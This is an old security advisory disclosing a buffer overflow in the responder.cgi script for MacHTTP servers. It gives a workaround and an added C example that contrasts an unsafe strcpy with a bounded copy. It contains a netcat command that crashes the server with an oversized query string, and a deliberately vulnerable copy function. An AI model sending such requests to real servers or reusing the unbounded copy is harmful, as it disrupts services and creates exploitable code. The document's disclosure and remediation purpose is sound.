mSec - ../Macintosh Security/..
Presents:
Responder.cgi Vulnerability
Written by Epic, A Member of mSec
<epic@msec.net>
Released 4/9/99
Responder.cgi, a public domain C CGI shell for MacHTTP servers, contains a buffer overflow which, when exploited, freezes the server it runs on. You are at risk if your responder.cgi source contains the line:
char PostArg_Search[256];
This buffer receives the QUERY_STRING (everything after the ? in the requested URL). It holds only 256 bytes and the query string is copied into it without a length check, so a request with 257 or more characters after the ? overruns the buffer and crashes the server. (Since a C string also needs a terminating NUL, a 256-character query string already writes one byte past the end of the buffer; 257 or more characters are certain to.)
Exploit Example: (nc is netcat from avian.org; the whole request is a single line)
$ echo "GET /cgi-bin/responder.cgi?xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx" | nc machttp-server.com 80
Possible Workaround:
Remove responder.cgi from your /cgi-bin/ directory. If you need to keep it, fix the copy rather than the declaration: shrinking the array, or declaring it as a single char, does not remove the overflow and breaks the CGI. Instead, check the length of the QUERY_STRING before it is copied into PostArg_Search and reject any request whose query string, including its terminating NUL, does not fit in the 256 bytes, or use a bounded copy such as strncpy with the buffer size and terminate the result explicitly.
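The overflow described above and the bounded copy the workaround calls for, side by side, as an added example written for this page and not taken from responder.cgi (whose source is not reproduced here). The only thing borrowed from responder.cgi is the 256-byte PostArg_Search buffer; the names copy_query_unsafe, copy_query_bounded, query_fits and make_query, the POSTARG_SIZE macro, and the 'x'-filled test inputs are assumptions for illustration.

```c
/* Added example (not responder.cgi's own code): the unbounded-copy pattern
 * this advisory describes, next to a bounded replacement. Function names and
 * the POSTARG_SIZE macro are assumptions for illustration. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define POSTARG_SIZE 256   /* matches char PostArg_Search[256]; in the advisory */

/* The vulnerable shape: an unbounded copy of the QUERY_STRING into a fixed
 * 256-byte stack buffer. Deliberately never called below. A query string of
 * 255 characters plus the terminating NUL fills the buffer exactly; anything
 * longer writes past the end of PostArg_Search. */
void copy_query_unsafe(const char *query)
{
    char PostArg_Search[POSTARG_SIZE];
    strcpy(PostArg_Search, query);          /* no length check: overflow */
    (void)PostArg_Search;
}

/* Bounded replacement: refuse any query string that does not fit, counting
 * its NUL terminator. Returns 0 on success, -1 when rejected; on rejection
 * dst is left as an empty string so callers never see stale data. */
int copy_query_bounded(char *dst, size_t dstsize, const char *query)
{
    size_t len = strlen(query);
    if (dstsize == 0)
        return -1;
    if (len >= dstsize) {          /* 256+ chars cannot fit in 256 bytes with the NUL */
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, query, len + 1);   /* copies the terminator too */
    return 0;
}

/* Does a query string of n characters fit in PostArg_Search with its NUL? */
int query_fits(size_t n)
{
    return n < POSTARG_SIZE;
}

/* Build a query of n 'x' characters, like the advisory's netcat example
 * (constructed test input; caller frees). */
char *make_query(size_t n)
{
    char *q = malloc(n + 1);
    if (!q)
        return NULL;
    memset(q, 'x', n);
    q[n] = '\0';
    return q;
}

int main(void)
{
    char PostArg_Search[POSTARG_SIZE];
    size_t lens[] = { 10, 255, 256, 257, 1024 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        char *q = make_query(lens[i]);
        if (!q)
            return 1;
        int rc = copy_query_bounded(PostArg_Search, sizeof PostArg_Search, q);
        printf("%4zu chars after ?: %s\n", lens[i],
               rc == 0 ? "accepted" : "rejected (would overflow)");
        free(q);
    }
    return 0;
}
```

The bounded version rejects a 256-character query string as well as the 257-character one the advisory names, because the 256th byte of the buffer is needed for the NUL; any fix that only caps the count at 256 still leaves a one-byte overrun.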